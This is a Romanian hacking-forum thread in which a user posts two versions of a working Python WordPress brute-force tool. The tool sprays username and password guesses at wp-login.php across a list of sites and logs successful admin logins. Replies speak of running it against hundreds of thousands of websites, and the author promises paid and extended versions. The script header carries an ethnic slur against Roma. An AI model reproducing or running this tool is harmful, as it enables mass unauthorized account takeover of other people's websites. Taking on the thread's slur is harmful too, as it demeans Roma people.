Jump to content
Brenin

Wordpress BruteForce Tool

Recommended Posts

Posted (edited)

Un mic cadou din partea mea, poate fi considerat un fel de demo pentru un release ulterior in RST Market.


#################################
### Wordpress BruteForce Tool ###
### Not designed for gypsies ###
### Author: Brenin@RST ###
### Jabber: obelix@creep.im ###
#################################

import urllib, urllib2, cookielib
from threading import Thread

def checker(username,password,urlogin,urlreq):
try:
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
login_data = urllib.urlencode({'log' : username, 'pwd' : password})
opener.open(urlogin, login_data)
resp = opener.open(urlreq)
barf = resp.read()
print "Checking login on " + urlogin + " with " + username + " and " + password
if "Dashboard" in barf:
fis = open("caremerg.txt", 'a')
fis.write(urlogin + " " + username + " @@@ " + password + "\n")
fis.flush()
print " GOOOOOOOOOOOOOOOOOOOD ONEEEEEEEEEEEEEEEEE!!!"
except Exception as e:
#print e -> Uncomment this and comment the line below if you want to see errors
f = 1

if __name__ == '__main__':
username = 'admin'
password = ['admin','123456','password','Password1']
fis = open("sites.txt", 'rU')
sites = fis.readlines()
for i in range(4):
for site in sites:
urlogin = site.rstrip() + "/wp-login.php"
urlreq = site.rstrip() + "/wp-admin/"
#checker(username,password[i],urlogin,urlreq) -> function call for test purposes . IF this bugs you delete it.
t = Thread(target = checker, args = (username,password[i],urlogin,urlreq))
t.start()
t.join(1)

Varianta de mai sus ruleaza cu setul de useri si parole setate in script.

Varianta de mai jos incarca setul de useri din users.txt , setul de parole din passes.txt



#################################
### Wordpress BruteForce Tool ###
### Not designed for gypsies ###
### Author: Brenin@RST ###
### Jabber: obelix@creep.im ###
#################################

import urllib, urllib2, cookielib
from threading import Thread

def checker(username,password,urlogin,urlreq):
try:
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
login_data = urllib.urlencode({'log' : username, 'pwd' : password})
opener.open(urlogin, login_data)
resp = opener.open(urlreq)
barf = resp.read()
print "Checking login on " + urlogin + " with " + username + " and " + password
if "Dashboard" in barf:
fis = open("caremerg.txt", 'a')
fis.write(urlogin + " " + username + " @@@ " + password + "\n")
fis.flush()
print " GOOOOOOOOOOOOOOOOOOOD ONEEEEEEEEEEEEEEEEE!!!"
except Exception as e:
#print e -> Uncomment this and comment the line below if you want to see errors
f = 1

if __name__ == '__main__':
fis = open("sites.txt", 'rU')
fispas = open("passes.txt",'rU')
fisusers = open("users.txt",'rU')
passwords = fispas.readlines()
users = fisusers.readlines()
sites = fis.readlines()
for passwd in passwords:
for user in users:
for site in sites:
urlogin = site.rstrip() + "/wp-login.php"
urlreq = site.rstrip() + "/wp-admin/"
#checker(user.rstrip(),passwd.rstrip(),urlogin,urlreq) -> function call for test purposes . IF this bugs you delete it.
t = Thread(target = checker, args = (user.rstrip(),passwd.rstrip(),urlogin,urlreq))
t.start()
t.join(1)

Va trebuie un fisier sites.txt care contine URL-uri in forma lor normala.

Exemplu: Jamie Oliver | Official site for recipes, books, tv, restaurants and food revolution

Se porneste cu:

python wpcrack.py

Daca se doreste, pot sa pun si varianta compilata pentru Windows.

Viitor update o sa adaug Joomla, Drupal, WHMCS, WHM, ZenCart, si alte sugestii din partea voastra.

Enjoy.

Edited by Brenin
  • Upvote 1
Posted

O sa il modific in cateva ore sa incarce liste de useri si parole, desi nu vad cum v-ar ajuta asta, considerand ca il folositi pe sute de mii de website-uri. Dar o sa urc si varianta asta.

Posted

EU il astept... probabil ca lumea e plecata in concediu si sunt mai putini online

O sa il compilez maine si o sa actualizez primul post,asteptam sa fie mai mult decat o singura cerere.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...